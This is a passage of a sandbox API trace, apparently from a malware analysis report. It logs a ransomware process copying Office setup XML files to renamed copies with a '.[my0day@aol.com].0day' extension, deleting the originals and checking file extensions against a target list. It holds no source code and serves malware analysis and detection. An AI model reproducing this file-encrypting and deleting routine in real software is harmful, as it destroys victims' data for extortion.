"c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\prjpror\\setup.xml.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0040.128] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PRJPROR\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\prjpror\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x200 [0040.128] SetFilePointerEx (in: hFile=0x200, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fec8 | out: lpNewFilePointer=0x0) returned 1 [0040.128] SetFilePointerEx (in: hFile=0x200, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fec8 | out: lpNewFilePointer=0x0) returned 1 [0040.128] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PRJPROR\\SETUP.XML.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\prjpror\\setup.xml.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x204 [0040.128] GetLastError () returned 0x0 [0040.128] ReadFile (in: hFile=0x200, lpBuffer=0x3270020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2b1fed4, lpOverlapped=0x0 | out: lpBuffer=0x3270020*, lpNumberOfBytesRead=0x2b1fed4*=0x412b, lpOverlapped=0x0) returned 1 [0040.130] WriteFile (in: hFile=0x204, lpBuffer=0x3270020*, nNumberOfBytesToWrite=0x4130, lpNumberOfBytesWritten=0x2b1fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3270020*, lpNumberOfBytesWritten=0x2b1fc9c*=0x4130, lpOverlapped=0x0) returned 1 [0040.131] ReadFile (in: hFile=0x200, lpBuffer=0x3270020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2b1fed4, lpOverlapped=0x0 | out: lpBuffer=0x3270020*, lpNumberOfBytesRead=0x2b1fed4*=0x0, lpOverlapped=0x0) returned 1 [0040.131] WriteFile (in: hFile=0x204, lpBuffer=0x3270020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x2b1fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3270020*, lpNumberOfBytesWritten=0x2b1fc9c*=0xe6, lpOverlapped=0x0) returned 1 [0040.131] SetEndOfFile (hFile=0x204) returned 1 [0040.132] CloseHandle (hObject=0x204) returned 1 [0040.132] SetFilePointerEx (in: hFile=0x200, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fec8 | out: lpNewFilePointer=0x0) returned 1 [0040.132] SetEndOfFile (hFile=0x200) returned 1 [0040.133] CloseHandle (hObject=0x200) returned 1 [0040.133] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PRJPROR\\SETUP.XML.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0040.133] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PRJPROR\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\prjpror\\setup.xml")) returned 1 [0040.133] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PRJPROR\\SETUP.XML") returned 97 [0040.134] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PRJPROR\\SETUP.XML") returned 97 [0040.134] lstrlenW (lpString=".doc") returned 4 [0040.134] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0040.134] lstrlenW (lpString=".docx") returned 5 [0040.134] lstrcmpiW (lpString1=".docx", lpString2="P.XML") returned -1 [0040.134] lstrlenW (lpString=".pdf") returned 4 [0040.134] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0040.134] lstrlenW (lpString=".xls") returned 4 [0040.134] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0040.134] lstrlenW (lpString=".xlsx") returned 5 [0040.134] lstrcmpiW (lpString1=".xlsx", lpString2="P.XML") returned -1 [0040.134] lstrlenW (lpString=".ppt") returned 4 [0040.134] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0040.134] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PRJPROR\\SETUP.XML") returned 97 [0040.134] lstrlenW (lpString=".zip") returned 4 [0040.134] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0040.134] lstrlenW (lpString=".rar") returned 4 [0040.134] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0040.134] lstrlenW (lpString=".bz2") returned 4 [0040.134] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0040.134] lstrlenW (lpString=".7z") returned 3 [0040.134] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0040.134] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PRJPROR\\SETUP.XML") returned 97 [0040.134] lstrlenW (lpString=".dbf") returned 4 [0040.134] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0040.134] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PRJPROR\\SETUP.XML") returned 97 [0040.134] lstrlenW (lpString=".1cd") returned 4 [0040.134] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0040.134] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PRJPROR\\SETUP.XML") returned 97 [0040.134] lstrlenW (lpString=".jpg") returned 4 [0040.134] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0040.134] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PRJPROR\\SETUP.XML") returned 97 [0040.134] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PRJPROR\\SETUP.XML") returned 97 [0040.134] lstrlenW (lpString=".doc") returned 4 [0040.135] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0040.135] lstrlenW (lpString=".docx") returned 5 [0040.135] lstrcmpiW (lpString1=".docx", lpString2="P.XML") returned -1 [0040.135] lstrlenW (lpString=".pdf") returned 4 [0040.135] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0040.135] lstrlenW (lpString=".xls") returned 4 [0040.135] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0040.135] lstrlenW (lpString=".xlsx") returned 5 [0040.135] lstrcmpiW (lpString1=".xlsx", lpString2="P.XML") returned -1 [0040.135] lstrlenW (lpString=".ppt") returned 4 [0040.135] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0040.135] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PRJPROR\\SETUP.XML") returned 97 [0040.135] lstrlenW (lpString=".zip") returned 4 [0040.135] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0040.135] lstrlenW (lpString=".rar") returned 4 [0040.135] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0040.135] lstrlenW (lpString=".bz2") returned 4 [0040.135] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0040.135] lstrlenW (lpString=".7z") returned 3 [0040.135] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0040.135] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PRJPROR\\SETUP.XML") returned 97 [0040.135] lstrlenW (lpString=".dbf") returned 4 [0040.135] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0040.135] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PRJPROR\\SETUP.XML") returned 97 [0040.135] lstrlenW (lpString=".1cd") returned 4 [0040.135] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0040.135] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PRJPROR\\SETUP.XML") returned 97 [0040.135] lstrlenW (lpString=".jpg") returned 4 [0040.135] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0040.135] lstrcmpiW (lpString1=".XML", lpString2=".0day") returned 1 [0040.136] lstrlenW (lpString="ProjectMUI.XML") returned 14 [0040.136] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Project.en-us\\ProjectMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\project.en-us\\projectmui.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x200 [0040.136] GetFileSizeEx (in: hFile=0x200, lpFileSize=0x2b1ff1c | out: lpFileSize=0x2b1ff1c*=1452) returned 1 [0040.136] CloseHandle (hObject=0x200) returned 1 [0040.136] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Project.en-us\\ProjectMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\project.en-us\\projectmui.xml")) returned 0x20 [0040.136] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Project.en-us\\ProjectMUI.XML.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\project.en-us\\projectmui.xml.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0040.136] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Project.en-us\\ProjectMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\project.en-us\\projectmui.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x200 [0040.136] SetFilePointerEx (in: hFile=0x200, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fec8 | out: lpNewFilePointer=0x0) returned 1 [0040.136] SetFilePointerEx (in: hFile=0x200, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fec8 | out: lpNewFilePointer=0x0) returned 1 [0040.136] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Project.en-us\\ProjectMUI.XML.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\project.en-us\\projectmui.xml.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f8 [0040.138] GetLastError () returned 0x0 [0040.138] ReadFile (in: hFile=0x200, lpBuffer=0x3270020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2b1fed4, lpOverlapped=0x0 | out: lpBuffer=0x3270020*, lpNumberOfBytesRead=0x2b1fed4*=0x5ac, lpOverlapped=0x0) returned 1 [0040.139] WriteFile (in: hFile=0x1f8, lpBuffer=0x3270020*, nNumberOfBytesToWrite=0x5b0, lpNumberOfBytesWritten=0x2b1fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3270020*, lpNumberOfBytesWritten=0x2b1fc9c*=0x5b0, lpOverlapped=0x0) returned 1 [0040.140] ReadFile (in: hFile=0x200, lpBuffer=0x3270020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2b1fed4, lpOverlapped=0x0 | out: lpBuffer=0x3270020*, lpNumberOfBytesRead=0x2b1fed4*=0x0, lpOverlapped=0x0) returned 1 [0040.140] WriteFile (in: hFile=0x1f8, lpBuffer=0x3270020*, nNumberOfBytesToWrite=0xf0, lpNumberOfBytesWritten=0x2b1fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3270020*, lpNumberOfBytesWritten=0x2b1fc9c*=0xf0, lpOverlapped=0x0) returned 1 [0040.140] SetEndOfFile (hFile=0x1f8) returned 1 [0040.141] CloseHandle (hObject=0x1f8) returned 1 [0040.141] SetFilePointerEx (in: hFile=0x200, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fec8 | out: lpNewFilePointer=0x0) returned 1 [0040.141] SetEndOfFile (hFile=0x200) returned 1 [0040.142] CloseHandle (hObject=0x200) returned 1 [0040.142] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Project.en-us\\ProjectMUI.XML.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0040.142] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Project.en-us\\ProjectMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\project.en-us\\projectmui.xml")) returned 1 [0040.142] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Project.en-us\\ProjectMUI.XML") returned 108 [0040.142] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Project.en-us\\ProjectMUI.XML") returned 108 [0040.143] lstrlenW (lpString=".doc") returned 4 [0040.143] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0040.143] lstrlenW (lpString=".docx") returned 5 [0040.143] lstrcmpiW (lpString1=".docx", lpString2="I.XML") returned -1 [0040.143] lstrlenW (lpString=".pdf") returned 4 [0040.143] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0040.143] lstrlenW (lpString=".xls") returned 4 [0040.143] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0040.143] lstrlenW (lpString=".xlsx") returned 5 [0040.143] lstrcmpiW (lpString1=".xlsx", lpString2="I.XML") returned -1 [0040.143] lstrlenW (lpString=".ppt") returned 4 [0040.143] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0040.143] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Project.en-us\\ProjectMUI.XML") returned 108 [0040.143] lstrlenW (lpString=".zip") returned 4 [0040.143] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0040.143] lstrlenW (lpString=".rar") returned 4 [0040.143] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0040.143] lstrlenW (lpString=".bz2") returned 4 [0040.143] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0040.143] lstrlenW (lpString=".7z") returned 3 [0040.143] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0040.143] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Project.en-us\\ProjectMUI.XML") returned 108 [0040.143] lstrlenW (lpString=".dbf") returned 4 [0040.143] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0040.143] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Project.en-us\\ProjectMUI.XML") returned 108 [0040.143] lstrlenW (lpString=".1cd") returned 4 [0040.143] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0040.143] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Project.en-us\\ProjectMUI.XML") returned 108 [0040.143] lstrlenW (lpString=".jpg") returned 4 [0040.143] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0040.143] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Project.en-us\\ProjectMUI.XML") returned 108 [0040.143] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Project.en-us\\ProjectMUI.XML") returned 108 [0040.143] lstrlenW (lpString=".doc") returned 4 [0040.144] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0040.144] lstrlenW (lpString=".docx") returned 5 [0040.144] lstrcmpiW (lpString1=".docx", lpString2="I.XML") returned -1 [0040.144] lstrlenW (lpString=".pdf") returned 4 [0040.144] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0040.144] lstrlenW (lpString=".xls") returned 4 [0040.144] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0040.144] lstrlenW (lpString=".xlsx") returned 5 [0040.144] lstrcmpiW (lpString1=".xlsx", lpString2="I.XML") returned -1 [0040.144] lstrlenW (lpString=".ppt") returned 4 [0040.144] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0040.144] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Project.en-us\\ProjectMUI.XML") returned 108 [0040.144] lstrlenW (lpString=".zip") returned 4 [0040.144] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0040.144] lstrlenW (lpString=".rar") returned 4 [0040.144] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0040.144] lstrlenW (lpString=".bz2") returned 4 [0040.144] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0040.144] lstrlenW (lpString=".7z") returned 3 [0040.144] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0040.144] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Project.en-us\\ProjectMUI.XML") returned 108 [0040.144] lstrlenW (lpString=".dbf") returned 4 [0040.144] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0040.144] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Project.en-us\\ProjectMUI.XML") returned 108 [0040.144] lstrlenW (lpString=".1cd") returned 4 [0040.144] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0040.144] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Project.en-us\\ProjectMUI.XML") returned 108 [0040.144] lstrlenW (lpString=".jpg") returned 4 [0040.144] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0040.144] lstrcmpiW (lpString1=".XML", lpString2=".0day") returned 1 [0040.145] lstrlenW (lpString="SETUP.XML") returned 9 [0040.145] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Project.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\project.en-us\\setup.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x200 [0040.145] GetFileSizeEx (in: hFile=0x200, lpFileSize=0x2b1ff1c | out: lpFileSize=0x2b1ff1c*=1872) returned 1 [0040.145] CloseHandle (hObject=0x200) returned 1 [0040.145] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Project.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\project.en-us\\setup.xml")) returned 0x20 [0040.145] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Project.en-us\\SETUP.XML.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\project.en-us\\setup.xml.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0040.145] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Project.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\project.en-us\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x200 [0040.145] SetFilePointerEx (in: hFile=0x200, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fec8 | out: lpNewFilePointer=0x0) returned 1 [0040.145] SetFilePointerEx (in: hFile=0x200, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fec8 | out: lpNewFilePointer=0x0) returned 1 [0040.145] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Project.en-us\\SETUP.XML.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\project.en-us\\setup.xml.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f8 [0040.146] GetLastError () returned 0x0 [0040.146] ReadFile (in: hFile=0x200, lpBuffer=0x3270020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2b1fed4, lpOverlapped=0x0 | out: lpBuffer=0x3270020*, lpNumberOfBytesRead=0x2b1fed4*=0x750, lpOverlapped=0x0) returned 1 [0040.506] WriteFile (in: hFile=0x1f8, lpBuffer=0x3270020*, nNumberOfBytesToWrite=0x760, lpNumberOfBytesWritten=0x2b1fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3270020*, lpNumberOfBytesWritten=0x2b1fc9c*=0x760, lpOverlapped=0x0) returned 1 [0040.507] ReadFile (in: hFile=0x200, lpBuffer=0x3270020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2b1fed4, lpOverlapped=0x0 | out: lpBuffer=0x3270020*, lpNumberOfBytesRead=0x2b1fed4*=0x0, lpOverlapped=0x0) returned 1 [0040.507] WriteFile (in: hFile=0x1f8, lpBuffer=0x3270020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x2b1fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3270020*, lpNumberOfBytesWritten=0x2b1fc9c*=0xe6, lpOverlapped=0x0) returned 1 [0040.507] SetEndOfFile (hFile=0x1f8) returned 1 [0040.507] CloseHandle (hObject=0x1f8) returned 1 [0040.508] SetFilePointerEx (in: hFile=0x200, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fec8 | out: lpNewFilePointer=0x0) returned 1 [0040.508] SetEndOfFile (hFile=0x200) returned 1 [0040.509] CloseHandle (hObject=0x200) returned 1 [0040.509] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Project.en-us\\SETUP.XML.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0040.509] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Project.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\project.en-us\\setup.xml")) returned 1 [0040.509] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Project.en-us\\SETUP.XML") returned 103 [0040.509] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Project.en-us\\SETUP.XML") returned 103 [0040.509] lstrlenW (lpString=".doc") returned 4 [0040.509] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0040.509] lstrlenW (lpString=".docx") returned 5 [0040.509] lstrcmpiW (lpString1=".docx", lpString2="P.XML") returned -1 [0040.509] lstrlenW (lpString=".pdf") returned 4 [0040.509] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0040.509] lstrlenW (lpString=".xls") returned 4 [0040.509] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0040.509] lstrlenW (lpString=".xlsx") returned 5 [0040.509] lstrcmpiW (lpString1=".xlsx", lpString2="P.XML") returned -1 [0040.509] lstrlenW (lpString=".ppt") returned 4 [0040.509] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0040.509] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Project.en-us\\SETUP.XML") returned 103 [0040.510] lstrlenW (lpString=".zip") returned 4 [0040.510] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0040.510] lstrlenW (lpString=".rar") returned 4 [0040.510] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0040.510] lstrlenW (lpString=".bz2") returned 4 [0040.510] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0040.510] lstrlenW (lpString=".7z") returned 3 [0040.510] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0040.510] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Project.en-us\\SETUP.XML") returned 103 [0040.510] lstrlenW (lpString=".dbf") returned 4 [0040.510] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0040.510] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Project.en-us\\SETUP.XML") returned 103 [0040.510] lstrlenW (lpString=".1cd") returned 4 [0040.510] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0040.510] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Project.en-us\\SETUP.XML") returned 103 [0040.510] lstrlenW (lpString=".jpg") returned 4 [0040.510] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0040.510] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Project.en-us\\SETUP.XML") returned 103 [0040.510] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Project.en-us\\SETUP.XML") returned 103 [0040.510] lstrlenW (lpString=".doc") returned 4 [0040.510] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0040.510] lstrlenW (lpString=".docx") returned 5 [0040.510] lstrcmpiW (lpString1=".docx", lpString2="P.XML") returned -1 [0040.510] lstrlenW (lpString=".pdf") returned 4 [0040.510] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0040.510] lstrlenW (lpString=".xls") returned 4 [0040.510] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0040.510] lstrlenW (lpString=".xlsx") returned 5 [0040.510] lstrcmpiW (lpString1=".xlsx", lpString2="P.XML") returned -1 [0040.510] lstrlenW (lpString=".ppt") returned 4 [0040.510] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0040.510] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Project.en-us\\SETUP.XML") returned 103 [0040.510] lstrlenW (lpString=".zip") returned 4 [0040.510] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0040.511] lstrlenW (lpString=".rar") returned 4 [0040.511] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0040.511] lstrlenW (lpString=".bz2") returned 4 [0040.511] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0040.511] lstrlenW (lpString=".7z") returned 3 [0040.511] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0040.511] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Project.en-us\\SETUP.XML") returned 103 [0040.511] lstrlenW (lpString=".dbf") returned 4 [0040.511] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0040.511] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Project.en-us\\SETUP.XML") returned 103 [0040.511] lstrlenW (lpString=".1cd") returned 4 [0040.511] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0040.511] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Project.en-us\\SETUP.XML") returned 103 [0040.511] lstrlenW (lpString=".jpg") returned 4 [0040.511] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0040.511] lstrcmpiW (lpString1=".XML", lpString2=".0day") returned 1 [0040.511] lstrlenW (lpString="SETUP.XML") returned 9 [0040.511] CreateFileW 